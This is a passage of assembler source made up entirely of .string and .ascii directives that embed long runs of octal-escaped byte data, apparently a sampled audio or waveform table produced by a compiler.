\026\354\b\004\376\004\325\320\330\300\316\347\332\326\004\002\346\005\025\f\025\006\t\036\031\0305\036\031.$=5?:.\007%.\0376->8WZL-\032\022\020\356\f\013\350\343\303\367\355\317\267\251\222\217\262\325\323\331\355\351\372\004\022\022\377\372\013\016\032HN+NB7:\036*\033\363\374\035\f\366\376\003\375\003\f\003\371\334\333\364\360\345\342\326\301\334\302\315\320\245\261\271\301\275\322\312\313\355\362\363\366\370" .string "\362\342\013\026\007\n\f\363\356" .string "\b\036\004" .string "\f\023\013\026\"\f\013\013" .string "\374\374\362\350\346\331\362\003\346" .string "\367\367\356\365\006\352\350\316\332\327\327\376\367\351\004\023\026$*4,\037\0375&3M;*!5>.\f\n\035\016\030&\031\032&39>./\013\375\013\t\n\365\356\325\346\354\354\362\312\272\262\243\226\303\337\320\340\356\367\003\t\f\020\372\r\033)$>T-<B:)\032\375\006\376\365\033\021\377\001\n\013\013\007\005\376\344\354\372\356\354\370\340\316\341\324\333\311\260\271\265\261\304\327\312\312\334\335\351\351\347\360\352\350\365\t\363\361\365\354\360\370\021\017\370\005\013\032\027\034\030\006\f\t\b\002\024\372\007\374\362\025\026\n\r\025\004\016" .string "\375\375\347\313\346\341\326\357\352\346\350\n\024\030" .string "\001\007\351" .ascii "\036\036\013\031\024\020\031\035\035\022\016\007\031\023#0.8" .ascii "?FTL8" .string "024.F!\025'\r\f\021\003\362\316\262\266\305\276\316\334\325\326\354\362\361\350\341\357\343\354\377\025\r\024\023\026\016\002\376\367\347\331\362\355\353\367\372\360\371\b\020\020\t\022\017\374\005\026 \013\b\003\003\021\022\005\343\326\325\363\351\354\370\356\354\353\363\360\362\350\347\347\336\342\362\332\300\320\305\314\334\324\312\265\277\332\326\334\335\340\323\307\347\343\345\350\355\363\365\374\025!\027\027\036\036\037\036\033\"\013\003\036!\026)\037+.5>+(0514,2 \032\035\031\033\020\t\374\350\356\004\001\375\n\004\n\027\022\036\036\001\002\004\357\001\r\372\356\354\365\375\355\332\306\272\253\276\322\326\342\360\361\376\t\025%\022\034\030%=KH?:M?00\025\031\373\003\007\375\003\005\372\362\003\003\002\372\361\356\361\353\356\363\354\332\327\341\337\324\332\316\272\302\273\327\315\315\323\320\310\322\347\342\345\313\333\343\344\344\363\347\335\342\342\355\352\360\356\357\350\372" .ascii "\375\370\373\366\365\003\016\036\001\f\036\024!,5,+/51%" .string "\036\023\007\b\017\016\n\017\021\t\017\024\030\020\t\004\013\016\001\027\026\377\r\t" .string "\376\364\364\366\345\346\001\377\367\f\017\032\"\037)\022\020\024\032\026\027!\024\r\020\007\005\364\343\331\322\324\330\361\346\363\375\017\031\034\034!*\026):=>J:5@3)\037\n\374\366\354\361\363\350\351\351\347\352\357\353\346\344\332\342\336\330\345\336\320\334\330\334\335\322\324\327\312\311\322\307\315\316\331\336\350\350\344\350\342\362" .string "\363\362\370\362\354\364\372\373\377\362\370\371\361\373\004\363\361\377\361\366\376\002\021\f\003\031/(00%,2$\036\032\003\f\016\004\f\021\n\t\r\f\020\022\022\022\005\003\024\r\r\025\n\006\r\020\n\n\373\375\376\347\362\375\375" .string "\003\022\031\035\026\022\032\b\020\032\022\017\023\f\001\004\370\356\341\322\321\322\316\334\353\354\361\375\003\002\020\030\031%\0378B6FJFC4%\"\021\t\007\004\375\371\376\364\363\370\362\365\364\361\355\346\343\356\354\345\356\355\344\344\347\346\340\321\323\327\311\277\315\315\304\313\325\330\325\327\344\340\335\344\346\345\326\354\337\335\353\344\350\344\333\340\352\335\337\345\341\336\346\353\357\370\374\b\r\r\034(#*;-09'\"\035\"\036\034\033\"\037\024 ',')-(\033\030&-+**$\037\"\035\030\017\005\n\002\376\t\013\006\017\021\017\017\t\013\007\002\003\004\376" .string "\001\362\357\345\323\321\311\275\300\277\274\307\332\317\325\346\350\367\376" .ascii "\002\020\022#2/161+(\036\030\017\003\b\004\371\375\001\376\373" .ascii "\006\006\n\002\375\375\002\374\013\f\377\n\007\b\013" .string "\020\005\004\353\353\357\343\341\347\351\344\354\354\363\362\350\356\364\352\357\361\352\345\351\353\351\353\346\344\335\322\316\320\306\304\316\307\306\311\324\326\343\342\361\372\365\376\005\017\016\035\017\r\017\r\005\r\003\002\013\371\004\013\b\t\023\017\024\027\025\034\035\030(*&.0.-+&%\031\025\036\035\027\"*&,)%+\036%# \035\"\"\026\031\r\f\373\353\343\342\321\322\343\325\334\340\346\351\370\367\003\016\b\030\033\036$.)$* \030\017\006\002\370\354\354\354\335\340\346\341\344\347\337\342\333\331\344\337\342\353\355\345\362\357\355\372\352\345\347\334\316\324\327\316\343\330\333\340\342\354\357\356\347\367\356\353\362\365\363\373\375\372\372\363\362\357\344\343\347\340\334\346\347\353\364\374\004\007\013\017\036\025\"/(-)+*%$$$\034\037\033\016\031#\025\027\037\036!\027\031\033\036\033%& \"#\030\030\f\f\003\376\006\004\003\t\r\t\013\n\013\n\001" .string "\005\374\365" .string "\371\363\364\353\341\334\316\305\305\272\270\305\311\304\324\340\336\362\370\366\007\004\022\033\017\032(%#\037\" \025\016\007\002\365\370\374\361\364\375\372\374\371\370\373\371\365" .string "\002\376\006\016\t\013\016\t\b\002\005\363\t\361" .string "\376\305\355\330\353\002\357\003\374\360\363\353\375\364\350\n\004\037\016\371\352\351\372\320\323\273\262\325\316\322\370\337\363\t\b\016\374\036(\036\f\b\021,\026\002\017\362\361" .string "\377\342\352\"\030!(3(\016\020\366\005\365\377\364\337\372\005\r$\b 9\021\032\027\025\017\025\361\357\376\031\f\374\364\357\023\362\373\002\033&\035-\031\022\r\374\343\310\316\332\316\274\273\315\341\350\366\376\0342 )\037.W5 /).\035\007\r\027\023\006\007\001\020\"\034\003\002\023\036\013\362\377\364\367\003\350\343\367" .string "\373\372\021\020\033\013\361\374\371\004\354\342\340\333\355\354\317\340\342\342\340\324\366\367\003\t\377\367\007\t\364\336\325\323\321\270\231\263\277\307\323\327\361\376\f\020\002" .string "\025!\006" .string "\t\b\016\377\354\t\005" .string "\374\364\375\022\035\017\022\021\"\036\027\004\f\030\374\372\370\005\027\036\036\024\"64\031\016\"\023\f\017\004\003\r\r\376\371\003\t\t\006\370\025&\027\033\025\024\034\006\360\340\322\324\315\271\264\321\350\355\363\374\020\"&/.0:?'%31#\023\f\016\022" .string "" .string "\373\003\021\017\005\005\017\031\f\371\376\370\362\355\342\350\361\377" .string "\365\377\002\017\t\366\363\375\372\345\341\335\344\346\334\320\315\331\345\346\330\340\373\001\374\370\377\002\006\360\333\327\306\312\267\242\255\302\315\322\327\341\375\006\001\007\022\021\034\024\377\006\021\026\005\372\001\006\005\376" .string "\004\b\030\022\t\031$(\033\003\n\021\003\376\371\007\013\024\032\021\037(*&\025\026#\031\013\004\007\017\013" .string "\371\374\004\013\005\374\013!\034\021\016\024\027\013\361\334\324\316\314\277\270\315\341\350\360\365\f%%&*28;,!*0'\026\004\n\026\002\367\373\002\021\021\017\007\023\036\026\006\360\373\371\354\345\350\363\372" .string "\373\372\004\r\007\376\363\371\376\357\342\342\346\347\346\322\325\341\344\351\340\342\366\t\002\376\002\006\007\360\333\320\310\301\272\257\255\303\323\323\326\344\374\f\t\005\r\022\032\024\n\f\023\030\013\370\371\004\006\372\363\376\b\025\026\016\027 \032\006\001\t\t\370\361\375\007\017\f\r\023\"$\035\020\013\033\032\005" .string "\005\007\n\367\360\370\370" .string "" .string "\370\002\030\034\017\013\r\r\003\350\324\320\315\304\300\270\302\334\345\350\362\007\037' #156.#(/$\021\005\006\016\007\370\371\007\r\023\020\017\027\036\027\007\370\371\002\371\350\350\366\376\002\375\374\n\021\r\006\372\375\007\375\353\353\365\364\355\335\335\351\357\356\355\354\373\021\f\005\007\013\016\370\340\326\322\314\300\273\265\304\334\332\337\352\376\024\017\b\017\035!\036\026\023\031\035\020\001\373\001\n\375\364\377\016\024\026\024\027$%\030\013\002\006\f\375\360\372\007\013\n\005\016\033\034\024\f\007\022\027\007\375" .string "\004" .string "\364\346\354\366\365\364\365\367\t\025\n\001\002\003\373\340\312\310\307\275\265\264\273\317\334\341\345\373\022\032\027\022$.-%\036!%\033\007\377\372" .string "\002\365\354\375\f\013\t\n\022\032\022\002\372\364\371\370\350\343\360\373\375\370\370\006\020\b\001\374\373\005\005\363\354\365\370\360\343\335\353\363\356\355\363\375\016\023\n\t\r\f\377\347\327\331\326\307\302\304\316\337\346\351\363\004\023\030\021\024%-&\"\"$'\032\017\f\f\020\r\001\005\027\037\036 \")-!\031\023\017\017\017\001" .string "\020\024\021\021\024\037#\025\025\023\023\031\023\006\003\n\b\376\364\363\375\002\367\371\002\007\020\016\005\002\377\370\346\321\307\312\304\271\273\305\320\334\345\352\372\006\017\024\020\026&(\037\037\037\036\031\f\002" .string "\374\371\366\355\361\001\004\001\004\t\f\b\372\364\364\357\355\351\343\346\362\365\362\363\367\376\373\361\361\365\362\363\360\351\351\354\351\343\337\341\352\352\344\351\365\371\376\377\373\374\370\355\341\321\312\315\310\276\301\314\322\336\344\353\370" .string "\006\b\013\022\035\037\033\036! \032\023\r\020\f\007\006\002\t\027\033\031\036$%\036\022\020\023\r\b\t\007\f\024\025\024\030\033\035\032\021\022\030\023\020\020\f\f\f\007\004\002\002\007\005\376\005\016\016\f\f\006\002\371\354\341\330\320\322\316\310\321\336\345\356\367\001\r\022\025\035 $.-(*+%\037\024\021\020\006\377" .string "\001\004\r\016\016\022\022\021\t\377\375\377\371\361\365\366\372\377\001\001\004\005\002\376\366\367\376\370\364\366\363\362\364\361\360\357\356\362\360\356\363\376\375\372\377\372\365\356\342\335\325\313\314\310\306\315\330\337\345\355\364\375\377\001\n\020\023\030\034\030\034\036\033\026\020\f\f\004\375\003\007\n\021\024\024\027\030\025\021\n\007\b\002\374\001\006\b\r\017\020\022\020\016\f\006\005\n\004\377\002\002\001\377\375\374\375\371\370\372\367\372" .string "\376\370\367\363\355\343\330\323\316\307\304\311\310\320\336\344\354\365\374\004\t\013\025\033\033\036\"\037\036 \031\025\017\007\005\376\367\375\001" .ascii "\004\006\b" .string "\b\007\003\001\373\364\366\363\355\363\371\374\377" .string "\001\002\377\373\374\367\364\366\363\357\362\366\364\365\362\363\364\361\361\365\365\365\373\374\371\367\366\361\352\340\333\331\320\314\320\324\330\343\352\356\366\375\004\n\n\021\032\031\033!\"## \035\030\022\021\017\n\016\025\024\026\032\034\035\034\027\026\022\n\013\013\b\f\024\025\027\031\032\033\030\023\022\020\t\n\n\006\b\f\013\t\b\006\007\003\376\001\003\377\377" .string "\372\371\365\356\351\336\330\327\322\316\325\335\340\351\362\371\002\t\017\026\030\033\"#!%($\"\035\030\024\f\b\t\005\003\007\007\007\n\013\013\b\003\376\374\366\364\370\367\372" .string "\002\002\004\004\005\001\374\371\371\364\360\364\364\363\370\370\366\365\362\365\363\356\361\364\362\360\364\364\362\356\351\343\334\324\322\320\314\320\331\334\340\352\360\367\376\002\b\f\f\021\027\026\031\037\035\033\030\025\023\017\t\013\013\b\013\017\016\021\024\021\020\n\006\007\003\377\004\b\007\f\020\017\022\021\020\016\b\004\005\001\375\001\003\001\002\003" .string "" .string "\375\373\373\366\363\366\364\360\362\361\355\350\341\334\327\320\315\320\317\321\334\341\347\360\372\001\b\013\017\025\024\027\035\035\035 \036\031\026\021\016\n\003\003\004\377" .string "\004\004\004\004\002\377\373\366\366\366\362\365\373\373\375\002\003\004\002\377\375\370\363\363\364\361\363\370\366\367\367\366\367\363\361\363\361\355\361\362\361\362\362\355\351\344\337\340\334\332\340\343\342\355\360\360\367\001\351\366\377\344\020.%\023- \r0\r,\024\355\020\003\315\343\350\300\364\352\362\346\360\342\352\340\327\351\366\007\007/\023%\0171\370\336\374\305\374\360\333\343\330\273\341\353\361\016\355\376\356\361\375\020\344\364\366\265\326\324\326\324\347\336\f\n5L>J(D\033+\376\377\352\313\371\002\373\f\013\313\r\352\002=\013\026\031\375\357\003\330\365\356\345\f\367\366\007\013\347&\037'2.B06*:\005(!\023'\036\016\005\027\347\033\006\"Q6K8\r\005\022\335\t\373\334\373" .string "\360\367\t\342\037\343\341\001\362\017\033\027\371\035\365\001\370\356\376\003\367\372\026\36655>G(!\027\363\345\374\321\367\361\360\372\351\342\337\351\312\373\355\n'\026%\"\004\375\023\335\357\354\347\344\335\317\324\337\310\372\355\001\013\360\345\353\333\333\353\312\360\331\314\331\310\304\325\325\331\035\032;M@60\026\371\003\325\363\344\342\375\373\360\372\375\337\023\003\035)\022\003\004\355\335\365\326\375\356\371\003\365\357" .string "\006\0043\"=<:<;\035\033,\005,\033\031\033\007\373\005\376\365)\036?L=.\"" .string "\375\005\333\005\361\353\361\355\343\363\365\346\373\316\357\362\373\002\007\372\372\004\342\r\372\367\377\373\352\003\030%N5A2\033\b\003\337\337\354\322\363\342\343\341\335\314\340\341\342\t\375\"\027\025\013\n\370\364\366\334\362\334\343\334\326\313\333\324\342\013\361\001\355\344\335\337\320\334\336\304\335\311\310\311\312\301\341\342\3762#?9+\032\030\365\361\354\326\356\344\356\361\372\350\374\371\005)\026'\033\t\370\001\347\356\367\355\003\364\377\375\374\361\017\017\032<0KA=42\031\"#\024%\021\024\f\013\375\022\f\032=8K;/\031\025\370\004\375\356\005\357\364\360\363\347\373\346\337\354\336\371\376" .string "\374\004\356\001\375\363\r\375\377\002\013\004)0:I44\"\020\367\371\336\350\345\335\353\333\336\332\337\323\357\355\374\023\021\037\024\017\002\004\350\367\356\344\360\340\341\330\332\322\353\344\364\376\357\365\350\342\331\342\312\335\325\310\326\310\311\311\322\323\370\373\0320'3*\031\005\005\343\356\346\343\366\356\362\365\373\362\016\013\037)\036 \025\006\370\002\351\373\372\372\005\376\377\001\006" .string "!\0363ABIB:-1\025$\034\027\033\020\017\n\f\007#\0369E@>-\037\r\013\364\005\367\366\376\364\361\361\360\343\361\330\346\357\356\375" .string "\374\367\001\360\005\374\377\n\002\003\016\030\033>6B=,#\023\376\357\362\332\350\336\336\340\332\327\334\340\334\374\370\r\026\026\026\016\002\371\372\345\364\350\346\344\336\331\331\334\333\363\351\370\364\356\351\344\335\327\331\312\331\311\312\313\310\306\317\331\344\004\006#% \036\024\377\365\362\335\356\342\352\362\357\357\372\376\001\034\025'\"\032\025\f\373\371\376\354\377\370\374\376\376\374\006\013\017-*?DD@;+&%\022 \022\021\r\013\006\013\021\0300-@=5)\037\r\004" .string "\362\376\357\363\361\356\347\352\343\336\344\331\356\357\364\371\375\363\371\374\364\003\370" .string "\001\003\b\033\"-@3:,\036\021\006\355\354\346\325\341\325\330\327\330\325\343\343\355\006\001\022\022\021\b\007\366\365\361\340\353\336\335\331\334\325\337\340\346\363\351\363\355\353\342\343\326\326\321\307\320\302\310\310\313\312\333\343\363\007\b\033\025\022\t\001\354\353\344\333\350\340\353\357\364\365\007\006\021\037\030$\033\026\017\t\366\375\370\357\377\371\377\001\004\002\022\021\03720@?=42\036!\027\n\024\t\n\n\017\t\031\032'41=5-\036\031\002\001\370\361\371\360\364\360\357\342\346\332\333\337\337\361\360\366\367\372\356\367\363\361\374\370\005\t\022\027,(39/3$\031\n" .string "\347\353\336\330\342\333\341\341\344\342\362\353\372\007\003\017\r\t\001\377\353\360\343\334\344\334\336\337\343\333\352\343\354\362\355\367\364\357\346\345\323\326\314\314\322\314\321\324\331\327\353\353\373\004\007\021\t\004\372\364\340\345\333\337\350\351\366\373\001\002\024\016\034\" '\036\030\017\b\367\002\370\373\006\005\n\r\020\017 \031+45>=7.)\024\032\013\n\021\r\016\023\027\023%!276:2&\030\021\374" .string "\365\367\373\367\366\363\356\337\344\327\340\342\351\365\366\367\366\366\352\365\356\367" .string "\004\020\031\036#4+851/ \022\005\370\343\354\337\342\351\350\353\357\356\355\373\362\003\007\b\016\f\003\374\366\343\353\335\337\345\344\343\347\346\342\357\346\366\367\371\374\372\356\345\341\321\327\315\324\327\330\332\340\341\342\362\356\377\377\004\006\001\365\356\347\331\342\334\351\360\367\377\007\007\013\032\024%%'&\037\022\r\004\370\005\374\006\f\017\021\027\023\027%\03503787*#\033\013\023\007\r\021\023\021\030\027\032)%7661*\030\r\004\366\374\362\372\372\370\362\361\344\333\337\327\345\345\357\363\365\356\357\354\346\363\360" .string "\007\017\026!\037&1+7/-$\027\003\374\356\341\352\341\352\356\360\357\365\355\362\373\364\005\005\t\007\005\366\362\350\334\345\334\342\345\347\341\347\342\346\356\353\373\372\375\367\365\345\337\327\317\325\317\331\333\337\335\345\341\346\356\354\374\370\374\370\363\342\341\331\326\342\340\362\367\375" .string "\013\005\017\032\030'#%\037\027\006\007\375\370\004" .ascii "\013\017\022\021\030\020\030\"\037/12-*\030\026\013\004\f\006" .ascii "\r\017\023\017\027\024\036''30-\"\033\007\002\366\363\367\361" .ascii "\371\366\363\350\347\330\332\331\331\350\347\355\355\356\342" .ascii "\350\342\347\364\366\007\016\023\026#\034',*1)\"\027\013\364" .ascii "\365\346\342\353\350\360\362\363\357\366\352\363\372\371\005" .ascii "\005\005\376\372\350\352\335\334\343\340\345\345\346\340\347" .ascii "\340\354\360\363\376\374\372\361\353\333\333\317\321\330\326" .ascii "\337\341\343\337\345\336\352\352\355\371\364\361\354\345\326" .ascii "\334\324\334\350\353\370\377\001\002\016\b\027\034\037)$\037" .ascii "\031\021\376\005\374\377\007\n\021\023\023\020\031\017\034!&" .ascii "..+#\034\013\017\004\006\f\r\021\021\023\021\031\025%'*0*#\027" .ascii "\r\374\376\360\365\371\366\371\365\355\343\341\323\337\335\341" .ascii "\355\355\352\351\347\335\351\344\362\376\003\016\027\030\032" .ascii "&\037-,/.(\030\017\002\361\362\352\356\363\364\370\371\364\361" .ascii "\367\357\371\372\375" .string "\003\374\373\357\355\332\350\326\347\331\337\311\367\364\305\351\3512\"Eh5\343\032\341\357\316\330\332\3435\315\355\274%\353\030\036\003\032\322\023\302\001\037\330\277\322\356\377\307\252\346\335\004:9A@<\025\026\022\357\337\315\327\303\276\301\277\272\324\321\272\313\350\013\006\r\377\334\326\270\275\276\273\332\303\275\273\266\312\276\260\326\327\361\f\371\022\033\025\026&\034\037$\t\b\013\024+\034\0371\033\036+/'5;\032\033!\022\021\007\375\0374F81I?YG5GD1\017\360\354\372\354\345\340\373\375\002\t\006\037%)\027\006\t\024\373\354\334\316\335\332\323\305\342\342\354\353\336\370\004\024\376\004\030\020\362\362\352\001\033\003\017\013\r\021\017\005\006\030\036\034\013\f\035\033\021\007\364\376\033\006\370\366\362\352\373\t\026?EMLCBI \016" .string "\372\023\363\372\002\n \026\0248SWXE6<3\006\363\341\323\326\300\306\314\320\332\326\300\320\357\347\345\345\341\340\331\267\260\255\253\267\253\255\262\305\313\302\277\320\345\357\370\346\357\365\346\322\316\306\307\333\321\335\363\t\001\371\364\t!(6185-\002\363\352\336\357\336\341\372\007\r\017\0307WdfXXW@%\f\006\003\367\336\334\346\345\346\356\354\376\035\034 \024\025\024\004\360\353\356\351\361\332\331\352\355\355\352\345\365\n\003\b\377\t\005\364\341\323\333\337\337\330\336\346\361\360\357\364\f\"\036\"$)!\020\372\364\372\374\001\362\372\017\021\021\024\0302LOaba^F+!!\033\021\003\004\013\020\005\006\025#66632#\374\332\322\335\341\351\352\364\002\f\003\377\n\027'\036\034\034\037\031\002\361\360\373" .string "\006\005\013\r\017\375\367\377\007\022\004\373\375\375\354\330\304\273\302\276\271\260\270\304\306\275\277\321\334\356\353\356\362\364\355\327\311\307\321\312\307\302\316\331\332\325\332\357\374\016\007\007\022\025\013\374\355\352\365\351\346\352\370\004\013\005\006\031\035$\026\021\030\030\n\370\362\364\005\003\b\021$-/%\"59:,##\033\001\353\337\337\354\344\345\350\362\377\375\365\372\023\037'\"#(\"\017\373\360\353\362\343\334\336\351\361\355\350\356\005\013\020\f\f\025\020\376\353\342\341\354\340\334\345\357\371\364\357\367\r\022\032\027\027\"\036\t\370\365\364\375\363\365\006\031')',@A@958.\021\375\372\365\373\356\355\370\005\013\004\375\374\007\003\003\003\020 \035\017\004\005\006\r" .string "\377\t\025\034\025\026#;<CGOZR;&!\025\025\001\370\001\004\002\367\361\370\n\004\003\377" .string "\003\365\335\313\313\307\306\270\270\306\315\314\310\311\323\352\350\351\351\355\360\340\310\272\275\267\270\255\257\274\305\306\302\307\325\353\351\351\354\363\367\352\330\314\323\317\314\302\302\313\320\315\307\315\337\367\367\377\t\026\037\026\007" .string "\005\001" .string "\362\364\001\003\373\364\366\003\026\021\030!+1%\022\013\023\020\021\013\023%,'%/;MHHLPL9\"\032\037\026\023\n\021\035!\032\027 -=68=C<&\022\t\013\001\375\363\371\005\b\377\374\b\025$\033\035#(#\023\006\004\n\001\375\361\366\376\370\353\345\353\363\374\361\364\371\372\362\337\315\310\310\271\260\243\246\257\260\257\272\316\340\364\364\375\007\f\004\365\346\347\357\347\351\353\372\t\017\017\032)3?79;7'\023\002\376\376\362\357\352\362\370\367\360\365\002\r\027\021\030\035\033\016\377\363\363\364\354\357\355\370" .string "\377\371\376\t\022\031\023\033\035\031\r\376\362\362\364\352\354\351\362\366\362\356\371\003\f\027\021\031\027\020\375\354\334\330\326\313\316\320\334\343\345\345\362\377\b\023\r\023\022\n\367\347\331\327\322\306\310\310\320\324\327\327\345\362\375\005\004\016\017\f\376\366\356\360\357\352\357\357\371\372\367\364\377\006\016\022\021\032\027\022\004\373\361\366\363\356\363\363\374\377\376\376\r\023\035\" '$\032\016\006\373" .string "\375\372\001\004\f\017\020\022$,9ABHD9(\036\022\023\n\003\004\003\004\003\002" .string "\r\021\031\031\024\023\t\371\346\337\330\337\337\346\360\367\002\006\b\013\033!-03:61)'%.*,.,-(! *'-*&$\032\013\374\362\350\355\343\342\346\347\351\347\345\347\362\362\373\373\373\372\365\351\340\333\326\333\322\323\324\324\323\322\320\324\337\342\354\352\354\354\346\331\320\313\307\313\306\314\316\321\322\322\317\323\332\333\341\334\336\335\326\314\312\307\311\321\315\325\327\332\333\334\332\342\352\353\363\357\361\355\346\334\332\325\330\342\340\351\356\365\370\375\376\013\024\031$$'%!\026\025\021\023\026\020\024\024\025\024\026\026 ',4251+!\037\033\036\036\034! ! ! *.49683-%% &''--/01.:9<<62(\033\017\013" .string "\003\377\374\375\372\366\361\354\347\356\353\357\362\362\363\363\360\355\361\360\372\371\373\376" .string "" .string "\001\006\013\031\036*/11-$\034\027\017\020\007\005\002\375\370\365\362\362\370\366\374\370\364\360\352\340\334\332\325\332\323\324\323\320\317\321\321\326\341\343\353\352\351\346\337\324\321\315\311\316\312\315\315\316\314\320\317\326\337\340\347\346\347\343\341\332\332\330\327\332\324\324\320\317\313\315\314\326\336\342\354\354\357\355\353\344\344\340\342\345\340\343\341\340\336\341\341\354\363\370\003\002\005\006\006\001\006\004\t\016\f\021\022\022\023\032\032&-28640* !\034\036\037\035\037\035\035\035\"!,158650+%&!#\"\037\037\035\034\033\036\036+-498850+-'+($#\037\032\027\026\023\034\031\033\032\024\016\t" .string "\367\365\352\352\343\334\331\327\324\326\335\341\360\366" .string "\005\006\005\005" .string "\374" .string "\376\005\006\n\r\020\022\026\034\036('*'!\033\023\n\003\001\371\371\363\360\354\350\343\343\342\345\357\355\363\362\357\352\345\334\331\330\323\331\326\326\326\326\324\330\331\334\345\343\350\347\344\337\335\326\324\325\321\326\323\323\322\323\321\326\331\336\351\352\360\357\353\344\340\326\323\321\316\321\316\320\320\322\322\330\333\340\351\352\357\355\353\347\345\336\335\335\333\341\337\342\343\345\346\360\363\374\t\r\025\026\027\024\023\f\020\020\020\025\025\026\030\031\027\035\036!*(,)'!\037\030\027\034\021\024\n\033\026#\025\031/\030+ \030,66\034\004)\026\013\007\004\013\343\020\031\017\026\036,\r+1*='\016(\024\0222\004" .string "\025\020\033\033\022\034\006\002\t\027\n\365\003\370\343\305\320\353\316\342\361\372\005" .string "\003\377\006\004\t\001\022\037&\016\025\027\0230#\0345%1G\0355#%-\027\"\034\031\016\366\354\344\347\357\361\356\344\360\363\336\344\354\330\330\343\360\355\370\352\350\354\342\366\357\366\374\356\002\376\364\t\374\363\377\363\370\373\344\356\342\335\324\331\345\340\332\332\334\324\326\325\313\313\321\314\344\332\332\326\307\320\306\316\333\333\347\347\353\356\350\367\344\356\372\355\367\375\355\347\337\324\336\336\345\352\357\356\353\364\365\366\001\003\001\n\021\027\f\006\r\374\001\017\030\032\035\036\033\035\027\032$\037#!\033 \026\025\t\375\004\367\371\007\377\004" .string "\375\372\371" .ascii "\375\003\005\b\006\t\007\b\007\017\022\033('+\"+\035!#\035#\034" .ascii "\034\022\b\002\367\351\357\342\340\350\335\341\333\321\317\317" .ascii "\321\326\336\340\350\355\356\357\367\365\377\005\r\030\027()" .ascii "(,4:?BG?87&\037\031\030\017\022\024\016\021\006\001\001\370\375" .ascii "\005\376\006\004\376\002\372\375\370\370\375\373\004\013\r\016" .ascii "\023\026\r\022\026\023\024\020\n\001\367\362\353\352\354\354" .ascii "\360\356\361\353\350\352\347\355\363\364\376\003\372\002\367" .ascii "\365\367\365\372" .string "\373\001\003\006\001\004" .string "\376" .string "\377\001\003\001\366\364\353\343\340\335\341\340\343\342\341\342\343\344\343\351\362\367\001\004\001\n\002\002\013\013\022\034!'-*.,*+-1.*\"\034\016\006\005\377\377\001\002\377\001\373\372\371\372\377\003\t\013\016\b\013\002\377\003\001\n\017\021\024\031\023\027\030\027\033\034\037\037\036\022\013\005\372\366\364\367\366\364\364\362\347\344\344\336\340\343\345\342\342\332\325\316\307\311\310\320\326\333\340\344\342\350\352\353\367\371\376" .string "\377\372\370\361\356\362\362\371" .string "\004\002\004\376\376\377\375\006\t\013\f\017\007\003\376\370\373\372\376\004\006\005\006\001\377" .string "\376\003\002\002\377\372\361\351\343\334\335\334\337\341\343\336\336\332\325\331\330\337\344\351\352\352\346\346\343\340\350\353\362\371" .string "\001\004\002\001\004\003\t\t\t\004\375\363\351\341\332\332\330\332\333\334\330\327\324\321\327\326\340\346\351\353\355\351\347\351\351\361\366" .string "\t\020\023\031\031\031 \"+./,*!\032\030\023\025\027\033\032\034\030\025\022\r\021\022\026\031\035\034\032\026\024\023\022\031\035$),,,*)-+010*$\032\023\016\b\f\f\016\017\021\f\013\n\007\r\016\024\031\033\031\031\022\r\f\t\r\017\022\023\024\016\f\t\003\004\002\003" .string "\375\365\357\345\336\335\332\337\342\350\352\356\355\356\361\361\371" .string "\t\020\027\027\033\031\031\035\034$).120/,*-*+)%\033\023\b\376\371\363\365\362\362\361\357\351\347\345\344\352\353\360\365\367\364\366\361\356\360\360\366\373\377\001\004" .string "\001\002" .string "\004\006\b\b\005\376\372\361\353\352\346\351\352\353\351\347\341\336\334\330\334\335\341\342\343\340\337\332\331\333\333\341\346\352\355\357\355\357\357\360\367\371\375\376\376\370\366\360\355\355\354\362\365\367\371\373\370\372\373\375\005\b\016\022\024\021\023\016\r\020\017\025\027\032\032\034\027\031\031\030\034\033\034\032\026\016\n\001\375\374\371\372\372\372\370\367\363\364\363\363\367\371\375\377\001\377" .string "\375\377\002\003\b\013\016\016\021\016\020\017\017\022\017\r\t\003\371\363\350\343\336\330\327\323\320\314\312\304\305\304\306\313\315\322\326\331\331\337\337\344\352\356\367\375\002\007\016\016\027\032\036\"#$\"\037\030\026\016\f\t\006\006\003\001\376\374\367\370\365\365\366\366\366\365\364\361\362\356\360\361\361\364\366\367\370\373\372\377\377\002\003\002" .string "\375\371\363\360\351\352\346\345\346\346\345\345\346\345\352\351\355\360\361\363\365\364\362\364\360\363\363\362\364\364\363\364\365\363\367\366\367\367\365\362\357\352\345\345\336\337\336\336\337\340\341\344\347\350\356\360\366\372\376\002\006\007\n\016\016\025\027\032\036!#')+0/21/,)\"\036\033\024\024\020\016\016\r\013\f\f\f\017\016\022\022\022\021\022\020\020\022\020\024\023\024\026\027\026\033\034\035\"!$#\"\037\035\027\026\023\016\016\013\n\b\007\003\004\001\377" .string "\375\375\372\370\364\361\354\353\351\346\347\345\346\346\350\352\357\361\367\375\377\004\006\007\007\t\006\t\t\n\016\016\022\024\026\027\033\033\037! \"!\037\036\035\030\032\027\026\026\023\023\022\021\017\022\017\022\023\021\021\016\n\007\004\376\376\372\371\370\366\366\365\364\364\366\364\367\370\370\371\370\367\366\366\365\370\367\372\373\374\375\376" .string "\001\005\005\013\n\n\n\007\002\376\371\363\362\353\353\350\345\344\342\340\340\342\340\344\343\344\345\344\342\344\344\345\352\352\360\362\365\370\375\377\005\013\016\025\027\034\035\035\033\034\031\030\031\026\030\027\027\026\026\024\025\025\024\026\025\025\023\021\017\016\013\013\f\013\016\r\r\f\016\r\021\021\024\027\026\027\025\023\016\f\007\006\004\001\003\001\001\001\002" .string "\004\003\006\b\007\b\007\005\001\002\376\377\376\375\375\372\371\367\366\362\364\361\361\360\356\354\350\343\336\334\326\326\325\325\327\330\332\334\337\340\347\351\357\365\370\374\377\001\003\006\006\f\016\021\024\025\026\026\027\027\032\031\034\034\032\031\025\017\013\006\377\377\372\370\367\365\363\362\360\357\361\357\363\362\361\361\360\355\354\354\352\355\354\356\357\357\356\360\357\360\364\364\370\371\372\371\371\365\363\361\355\357\355\357\356\356\355\355\353\352\353\351\353\351\351\346\344\340\336\333\331\333\331\333\333\333\332\334\333\336\341\342\350\351\354\355\356\354\355\354\354\360\361\366\371\373\375\002\002\006\n\013\021\022\024\024\024\021\022\020\020\022\020\022\022\022\020\022\017\020\021\021\024\023\023\021\017\n\t\004\002\003\001\003\002\002\001\002\377\001\001\001\004\004\005\004\003" .string "\001\376" .string "\002\002\004\005\006\006\b\006\t\t\t\f\013\n\007\003\375\371\362\360\355\351\351\346\343\340\335\330\330\330\331\336\340\342\345\347\347\352\352\355\360\361\365\370\371\372\375\373\377" .string "\003\006\006\007\006\004" .string "" .string "\374\374\374\374\376\377\377\376\376\374\376\376\377\001\001\001\377\376\373\374\371\373\374\375\377" .string 